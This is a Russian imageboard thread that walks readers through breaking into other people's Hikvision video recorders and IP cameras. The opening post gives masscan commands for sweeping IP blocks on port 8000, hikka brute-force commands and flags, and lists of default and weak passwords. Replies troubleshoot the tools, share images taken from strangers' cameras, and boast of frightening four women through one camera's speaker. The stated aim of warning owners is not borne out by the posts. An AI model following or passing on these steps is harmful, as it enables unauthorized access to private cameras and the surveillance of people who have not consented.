[Ответить в тред] Ответить в тред

03/04/16 - Набор в модераторы 03.04 по 8.04
26/03/16 - Конкурс: Помоги гомункулу обрести семью!
15/10/15 - Набор в модераторы 15.10 по 17.10


[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 31 | 6 | 8
Назад Вниз Каталог Обновить

Аноним # OP  16/05/16 Пнд 12:01:29  126722584  
14633892894340.jpg (20Кб, 611x86)
В этом треде проверяем видеорегистраторы и IP камеры Hikvision на простые пароли. О найденных проблемах сообщаем их владельцам.

Для этого нам понадобятся блоки IP http://www.iwik.org/ipcountry/ или http://ipgeobase.ru/cgi-bin/AdvSearch.cgi , программы masscan ( https://github.com/robertdavidgraham/masscan , https://mega.nz/#!e5820QiL!hOA2XLYCZq-OA4iRFjiDKWWUpl9h6W8q47OOZQU8ql8 ) и hikka ( https://github.com/superhacker777/hikka , https://mega.nz/#!34dUgKYb!fIOyCSbPQ7OntbexrvTwsFwIx-ZDFb2WKV6ZxaetU1U ).

В папке Masscan в hosts.txt вставим блоки IP. Запуск сканирования — start.bat. В нем команда masscan -p8000 -iL hosts.txt --rate=1000 -oX myscan.xml. По окончании сканирования откроем myscan.xml Excel и скопируем столбец H. Это IP адреса с открытым 8000 портом.

В папке Hikka в host вставим скопированные ранее IP. В logins и passwords должны быть ваши логины и пароли. Запуск сканирования — start.bat. В нем команда hikka -threads 200 -check -shoots pics. По окончании перебора в папке pics будут изображения с камер. Теперь можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .

Видеоинструкция: https://www.youtube.com/watch?v=ERZ6YFUlVKw
Аноним 16/05/16 Пнд 12:05:50  126722865
>>126722584 (OP)
Для самых маленьких, неспособных выполнить hikka -h публикую полный список команд:

-bf-threads int Bruteforcer threads count (default 1)
-check Check cameras (experimental and not fully tested, but very useful)
-csv string Write result to CSV
-json string Write result to JSON
-logins string A file with a list of logins to bruteforce (default "logins")
-m3u string Write result to m3u playlist
-passwords string A file with a list of passwords to bruteforce (default "passwords")
-port int Camera service port (default 8000)
-shoots string Download pics from cameras into a folder
-threads int Threads count (default 1)
Аноним 16/05/16 Пнд 12:07:44  126722991
14633896646050.jpg (80Кб, 904x373)
>>126722584 (OP)
Еще есть парсер для работы с российскими и украинскими блоками IP — IP_RU https://mega.nz/#!z8sGHaiY!cmVZZuERWtAqLqDekCNHTrkrI0mnEiyO5chMv9QjCJc . Показывает блоки IP по российским и украинским городам, областям и округам. Использует базу ipgeobase.ru . Саму базу надо скачать здесь http://ipgeobase.ru/cgi-bin/Archive.cgi файл geo_files.zip.
Аноним 16/05/16 Пнд 12:11:06  126723241
Начиная c прошивки 5.3.0 Hikvision вводит античит на свое оборудование. Многие компании начинают вводить аналогичные меры против бутфорса в свои прошивки тоже.

Новый пароль по-умолчанию

123456789aBc или 123456789abc
Аноним 16/05/16 Пнд 12:11:12  126723250
>>126722991
не кочайти
Аноним 16/05/16 Пнд 12:12:03  126723311
http://ftp.hikvision.ru/09.%20%D0%A3%D1%82%D0%B8%D0%BB%D0%B8%D1%82%D1%8B/BatchConfigTool200.exe

Сканер, брутер, IPCamera Killer
Аноним 16/05/16 Пнд 12:13:02  126723391
Ну вот есть у меня айпи и пароль куда вводить то ?
Аноним 16/05/16 Пнд 12:13:30  126723425
>>126723241
Пруфов конечно же нет. Понятно.
Аноним 16/05/16 Пнд 12:15:23  126723552
>>126722584 (OP)
Тебе в /web/ мало 3-х тредов хуесос ты абоссаный ?
Аноним 16/05/16 Пнд 12:16:33  126723628
>>126723425
В гугел могёшь?
https://www.google.ru/search?q=123456789abc++Hikvision&ie=utf-8&oe=utf-8&gws_rd=cr&ei=yY85V5zEKsbw6ATzwobIAw
Аноним 16/05/16 Пнд 12:16:51  126723657
>>126723391
Device management
Аноним 16/05/16 Пнд 12:22:16  126724084
Советую все-таки тем кто брутив поставить больше паролей. 12345 не везде. Буквально только что нашел на айпишниках из прошлого треда несколько камер с пассами "admin" и 7777777
Аноним 16/05/16 Пнд 12:49:27  126726543
14633921676370.jpg (103Кб, 1280x720)
4 ТЯН, КВЕСТРУМ, ДИНАМИК НА КАМЕРЕ.
Предлагай идеи ананас!
Аноним 16/05/16 Пнд 12:53:25  126726877
>>126726543
> КВЕСТРУМ
Самолёты какие были? Какой самый известный самолёт на тихоокеанском театре военных действий?
Аноним 16/05/16 Пнд 12:54:19  126726953
Сожми, плиз
http://www12.online-convert.com/ru/download-file/74907d5693a6ce89467a6b2f4d7b3703/converted-324de5a7.webm
Аноним 16/05/16 Пнд 12:54:43  126726988
>>126726543
Даже видосик подрубить можешь.
Аноним 16/05/16 Пнд 12:55:19  126727059
>>126726988
Сожми это>>126726953 - подрублю.
Аноним 16/05/16 Пнд 12:57:48  126727299
>>126726988
https://www.youtube.com/watch?v=QFsUsa2e70g
Аноним 16/05/16 Пнд 12:58:32  126727379
14633927129630.png (65Кб, 499x301)
>>126726543
Бляяяяя, я их напугал.
Бэукнул в микр, они переглянулись и съебали.
Аноним 16/05/16 Пнд 13:07:50  126728255
>>126726877
ИЛ 2 - штурмовик, и массершмит или как-то так, невецкий
Аноним 16/05/16 Пнд 13:08:31  126728321
>>126728255
Штука
Аноним 16/05/16 Пнд 13:11:08  126728536
x`n ey? gjqle cgfnm
Аноним 16/05/16 Пнд 13:15:51  126728928
14633937517240.webm webm file (4370Кб, 640x360, 00:03:52)
>>126727059
Аноним 16/05/16 Пнд 13:41:45  126731165
>>126722584 (OP)
Масскан не создает табличный файл. В чем может быть причина?
Аноним 16/05/16 Пнд 13:54:10  126732223
>>126731165
бамп
Аноним 16/05/16 Пнд 14:20:27  126734440
>>126731165
Та же хуйня, этот xml файл нихуя не таблица,а говно
Аноним 16/05/16 Пнд 14:23:03  126734671
>>126734440
У меня вообще никакого файла не создается, вот в чем проблема.
Аноним 16/05/16 Пнд 14:30:57  126735450
>>126734671
chmod поставь, линь же у тебя?
Аноним 16/05/16 Пнд 14:32:23  126735604
>>126735450
Сперма.
Аноним 16/05/16 Пнд 14:32:59  126735664
>>126735604
тогда не знаю
Аноним 16/05/16 Пнд 15:21:10  126740086
14634012700750.jpg (41Кб, 401x412)
Аноним 16/05/16 Пнд 15:22:35  126740238
Сканировал все подсети своего города nmap`ом, находил камеры Hikkvision и еще 2 других названий, но ничего интересного не показывают, всякие офисы, улицы, супермаркеты.

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 31 | 6 | 8
Назад Вверх Каталог Обновить

Топ тредов